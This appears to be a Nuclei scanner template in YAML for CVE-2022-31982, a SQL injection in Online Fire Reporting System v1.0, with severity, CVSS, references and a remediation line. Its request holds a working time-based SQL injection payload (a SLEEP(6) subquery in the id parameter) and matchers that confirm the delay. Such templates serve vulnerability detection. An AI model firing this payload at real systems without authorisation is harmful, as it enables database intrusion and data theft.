45 lines
1.9 KiB
YAML
45 lines
1.9 KiB
YAML
id: CVE-2022-31982
|
|
|
|
info:
|
|
name: Online Fire Reporting System v1.0 - SQL injection
|
|
author: theamanrawat
|
|
severity: high
|
|
description: |
|
|
Online Fire Reporting System v1.0 is vulnerable to SQL Injection via /ofrs/admin/?page=requests/view_request&id=.
|
|
impact: |
|
|
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
|
|
remediation: |
|
|
Upgrade to the latest version to mitigate this vulnerability.
|
|
reference:
|
|
- https://github.com/k0xx11/bug_report/blob/main/vendors/oretnom23/online-fire-reporting-system/SQLi-8.md
|
|
- https://www.sourcecodester.com/php/15346/online-fire-reporting-system-phpoop-free-source-code.html
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-31982
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 7.2
|
|
cve-id: CVE-2022-31982
|
|
cwe-id: CWE-89
|
|
epss-score: 0.01429
|
|
epss-percentile: 0.85199
|
|
cpe: cpe:2.3:a:online_fire_reporting_system_project:online_fire_reporting_system:1.0:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: "true"
|
|
max-request: 1
|
|
vendor: online_fire_reporting_system_project
|
|
product: online_fire_reporting_system
|
|
tags: cve,cve2022,sqli,online-fire-reporting,online_fire_reporting_system_project
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/admin/?page=requests/view_request&id=1'+AND+(SELECT+7774+FROM+(SELECT(SLEEP(6)))dPPt)+AND+'rogN'='rogN"
|
|
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- 'duration>=6'
|
|
- 'status_code == 200'
|
|
- 'contains(content_type, "text/html")'
|
|
- 'contains(body, "Request Detail")'
|
|
condition: and
|
|
# digest: 4a0a0047304502203027f38bd0c9023ed9ba3fda83800749d0a27b1c43164db6e39527d8a8ce9ce5022100b8cd78b1364c44138eaefce681f67c12d38eb16034013529c84c3f5c15f0d2d7:922c64590222798bb761d5b6d8e72950 |